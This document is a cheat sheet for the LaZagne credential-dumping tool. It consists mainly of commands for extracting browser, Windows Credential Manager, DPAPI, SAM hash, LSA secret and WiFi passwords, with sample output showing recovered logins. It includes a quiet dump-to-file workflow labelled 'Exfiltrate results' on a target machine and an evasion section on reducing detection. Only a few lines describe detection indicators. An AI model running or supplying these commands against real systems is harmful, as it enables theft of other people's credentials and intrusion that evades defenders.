LaZagne is an open-source application used to retrieve passwords stored on a local computer. It supports multiple platforms (Windows, Linux, macOS) and can extract credentials from a wide variety of software including browsers, email clients, databases, sysadmin tools, and Windows Credential Manager.
Multi-Platform : Works on Windows, Linux, and macOSBrowser Credentials : Chrome, Firefox, Edge, Opera, IE, and moreWindows Credentials : Credential Manager, DPAPI-protected secretsApplication Passwords : Email clients, databases, FTP clients, WiFi, etc.Memory Extraction : Some modules extract from process memory
# Download standalone executable
https://github.com/AlessandroZ/LaZagne/releases
# Or run from Python
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip install -r requirements.txt
python laZagne.py all
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip3 install -r requirements.txt
python3 laZagne.py all
# Windows
laZagne.exe all
# Linux/macOS
python3 laZagne.py all
laZagne.exe all -quiet
laZagne.exe all -oN # Normal text output
laZagne.exe all -oJ # JSON output
laZagne.exe all -oA # All formats
laZagne.exe -h
Category Description
browsersWeb browser credentials chatsMessaging applications databasesDatabase clients gamesGaming platforms gitGit credentials mailsEmail clients memoryProcess memory extraction multimediaMedia applications phpPHP-related tools svnSVN clients sysadminSystem administration tools wifiWiFi passwords windowsWindows Credential Manager, DPAPI
laZagne.exe browsers
laZagne.exe windows
laZagne.exe sysadmin
laZagne.exe wifi
laZagne.exe windows
Module Description
credmanWindows Credential Manager vaultWindows Vault dpapiDPAPI-protected secrets autologonAuto-logon credentials cachedumpCached domain credentials hashdumpLocal SAM hashes (requires SYSTEM) lsa_secretsLSA secrets (requires SYSTEM)
laZagne.exe windows -m credman
laZagne.exe windows -m vault
laZagne.exe windows -m dpapi
laZagne.exe browsers
Browser Module
Chrome chromeFirefox firefoxEdge (Chromium) chromiumedgeOpera operaInternet Explorer ieBrave braveVivaldi vivaldi
laZagne.exe browsers -m chrome
laZagne.exe browsers -m firefox
laZagne.exe all -user <username>
laZagne.exe all -password <user_password>
# Requires SAM, SECURITY, SYSTEM hives
laZagne.exe all -local -sam SAM -security SECURITY -system SYSTEM
laZagne.exe all -v
laZagne.exe all -vv # Extra verbose
laZagne.exe all -oN
# Creates: results/credentials.txt
laZagne.exe all -oJ
# Creates: results/credentials.json
laZagne.exe all -oA
# Creates both text and JSON files
laZagne.exe all -oN -output /path/to/output/
|====================================================================|
| |
| The LaZagne Project |
| |
| ! MUSIC AGAIN ! |
| |
|====================================================================|
------------------- Credman passwords -----------------
[+] Password found !!!
URL: Domain:interactive=SRV01\mcharles
Login: SRV01\mcharles
Password: P@ssw0rd123!
[+] Password found !!!
URL: https://github.com
Login: admin@company.com
Password: github_token_123
[+] 2 passwords have been found.
Module Description
envEnvironment variables memoryProcess memory mimipySimilar to Mimikatz dockerDocker credentials awsAWS credentials gcloudGoogle Cloud credentials
python3 laZagne.py all
python3 laZagne.py sysadmin
python3 laZagne.py memory
# Dump all credentials quietly
laZagne.exe all -quiet
# Save to JSON for parsing
laZagne.exe all -oJ -quiet
# Extract Credential Manager and Vault
laZagne.exe windows -m credman
laZagne.exe windows -m vault
# With user password for DPAPI
laZagne.exe windows -password 'UserPassword123'
# On Windows target
laZagne.exe all -oJ -output C:\Temp\ -quiet
# Exfiltrate results
type C:\Temp\credentials.json
Feature LaZagne Mimikatz pypykatz
Platform Multi-platform Windows Multi-platform Browser creds Yes No No Credential Manager Yes Yes Yes LSASS extraction Limited Full Full Application creds Extensive Limited No Kerberos attacks No Yes Limited
Process creation of LaZagne binary
Access to browser profile directories
DPAPI calls
Access to Credential Manager stores
Compile from source with modifications
Use Python script instead of binary
Run individual modules to reduce footprint
Use -quiet flag to minimize console output
Tool Description
Mimikatz Windows credential extraction from memory pypykatz Python Mimikatz implementation SharpDPAPI C# DPAPI attacks CredNinja Credential testing tool BrowserGather Browser credential extraction
LaZagne extracts credentials from many sources Mimikatz doesn’t cover (browsers, applications)
Works cross-platform (Windows, Linux, macOS)
Use -quiet and -oJ for clean, parseable output
Windows module specifically targets Credential Manager and DPAPI
Lower detection rate for application credentials vs LSASS-based tools
Combine with Mimikatz/pypykatz for comprehensive credential extraction